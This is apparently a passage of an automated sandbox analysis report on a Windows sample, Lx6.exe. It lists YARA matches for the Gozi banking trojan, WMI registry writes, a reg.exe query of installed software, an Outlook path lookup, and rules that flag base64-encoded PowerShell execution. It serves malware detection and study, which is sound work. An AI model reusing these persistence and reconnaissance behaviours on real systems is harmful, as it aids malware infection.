Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00757003 0_2_00757003
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0077115B 0_2_0077115B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00772AC4 0_2_00772AC4
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00765CFD 0_2_00765CFD
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00767702 0_2_00767702
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075579B 0_2_0075579B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03042AC4 35_2_03042AC4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0304115B 35_2_0304115B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03027003 35_2_03027003
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03037702 35_2_03037702
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302579B 35_2_0302579B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03035CFD 35_2_03035CFD
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E1AE8 41_2_000001CEDB3E1AE8
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB4088C8 41_2_000001CEDB4088C8
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E8454 41_2_000001CEDB3E8454
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FBB44 41_2_000001CEDB3FBB44
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB405B10 41_2_000001CEDB405B10
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3EE388 41_2_000001CEDB3EE388
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F8B60 41_2_000001CEDB3F8B60
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB40B28C 41_2_000001CEDB40B28C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB40321C 41_2_000001CEDB40321C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3EC29C 41_2_000001CEDB3EC29C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FB304 41_2_000001CEDB3FB304
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E92E4 41_2_000001CEDB3E92E4
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB408174 41_2_000001CEDB408174
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB409978 41_2_000001CEDB409978
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FB16C 41_2_000001CEDB3FB16C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F5954 41_2_000001CEDB3F5954
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F0A0C 41_2_000001CEDB3F0A0C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F51D0 41_2_000001CEDB3F51D0
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB403878 41_2_000001CEDB403878
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F10BC 41_2_000001CEDB3F10BC
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F8890 41_2_000001CEDB3F8890
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FD774 41_2_000001CEDB3FD774
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E4770 41_2_000001CEDB3E4770
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E77AC 41_2_000001CEDB3E77AC
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB409000 41_2_000001CEDB409000
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB405FC0 41_2_000001CEDB405FC0
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E5FD0 41_2_000001CEDB3E5FD0
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F6E4C 41_2_000001CEDB3F6E4C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB40AE38 41_2_000001CEDB40AE38
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F1E9C 41_2_000001CEDB3F1E9C
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FB6F0 41_2_000001CEDB3FB6F0
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FED64 41_2_000001CEDB3FED64
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB403D70 41_2_000001CEDB403D70
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB402578 41_2_000001CEDB402578
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F3DBC 41_2_000001CEDB3F3DBC
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E75A4 41_2_000001CEDB3E75A4
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB4045BC 41_2_000001CEDB4045BC
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F6428 41_2_000001CEDB3F6428
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3FE434 41_2_000001CEDB3FE434
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E6458 41_2_000001CEDB3E6458
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3ECC54 41_2_000001CEDB3ECC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB88C8 62_2_0000019933FB88C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F98454 62_2_0000019933F98454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F91AE8 62_2_0000019933F91AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB321C 62_2_0000019933FB321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA0A0C 62_2_0000019933FA0A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA51D0 62_2_0000019933FA51D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB8174 62_2_0000019933FB8174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB9978 62_2_0000019933FB9978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAB16C 62_2_0000019933FAB16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA5954 62_2_0000019933FA5954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA10BC 62_2_0000019933FA10BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA8890 62_2_0000019933FA8890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB3878 62_2_0000019933FB3878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB9000 62_2_0000019933FB9000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F95FD0 62_2_0000019933F95FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB5FC0 62_2_0000019933FB5FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F977AC 62_2_0000019933F977AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAD774 62_2_0000019933FAD774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F94770 62_2_0000019933F94770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAB6F0 62_2_0000019933FAB6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA1E9C 62_2_0000019933FA1E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA6E4C 62_2_0000019933FA6E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FBAE38 62_2_0000019933FBAE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB45BC 62_2_0000019933FB45BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA3DBC 62_2_0000019933FA3DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F975A4 62_2_0000019933F975A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB2578 62_2_0000019933FB2578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB3D70 62_2_0000019933FB3D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAED64 62_2_0000019933FAED64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9CC54 62_2_0000019933F9CC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F96458 62_2_0000019933F96458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAE434 62_2_0000019933FAE434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA6428 62_2_0000019933FA6428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9E388 62_2_0000019933F9E388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA8B60 62_2_0000019933FA8B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FABB44 62_2_0000019933FABB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB5B10 62_2_0000019933FB5B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FAB304 62_2_0000019933FAB304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F992E4 62_2_0000019933F992E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9C29C 62_2_0000019933F9C29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FBB28C 62_2_0000019933FBB28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F8454 67_2_000001FA9D6F8454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F1AE8 67_2_000001FA9D6F1AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D719000 67_2_000001FA9D719000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D715FC0 67_2_000001FA9D715FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F5FD0 67_2_000001FA9D6F5FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D708890 67_2_000001FA9D708890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D713878 67_2_000001FA9D713878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70B6F0 67_2_000001FA9D70B6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F77AC 67_2_000001FA9D6F77AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70D774 67_2_000001FA9D70D774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F4770 67_2_000001FA9D6F4770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D71321C 67_2_000001FA9D71321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D700A0C 67_2_000001FA9D700A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7051D0 67_2_000001FA9D7051D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6FC29C 67_2_000001FA9D6FC29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D71B28C 67_2_000001FA9D71B28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7010BC 67_2_000001FA9D7010BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7188C8 67_2_000001FA9D7188C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70B16C 67_2_000001FA9D70B16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D718174 67_2_000001FA9D718174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D719978 67_2_000001FA9D719978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D705954 67_2_000001FA9D705954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70E434 67_2_000001FA9D70E434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D706428 67_2_000001FA9D706428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6FCC54 67_2_000001FA9D6FCC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F6458 67_2_000001FA9D6F6458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D715B10 67_2_000001FA9D715B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70B304 67_2_000001FA9D70B304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F92E4 67_2_000001FA9D6F92E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6FE388 67_2_000001FA9D6FE388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D708B60 67_2_000001FA9D708B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70BB44 67_2_000001FA9D70BB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D71AE38 67_2_000001FA9D71AE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D703DBC 67_2_000001FA9D703DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D7145BC 67_2_000001FA9D7145BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D701E9C 67_2_000001FA9D701E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D706E4C 67_2_000001FA9D706E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F75A4 67_2_000001FA9D6F75A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D713D70 67_2_000001FA9D713D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D712578 67_2_000001FA9D712578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D70ED64 67_2_000001FA9D70ED64
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075C875 CreateProcessAsUserA, 0_2_0075C875
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses reg.exe to modify the Windows registry
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Uses 32bit PE files
Source: Lx6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
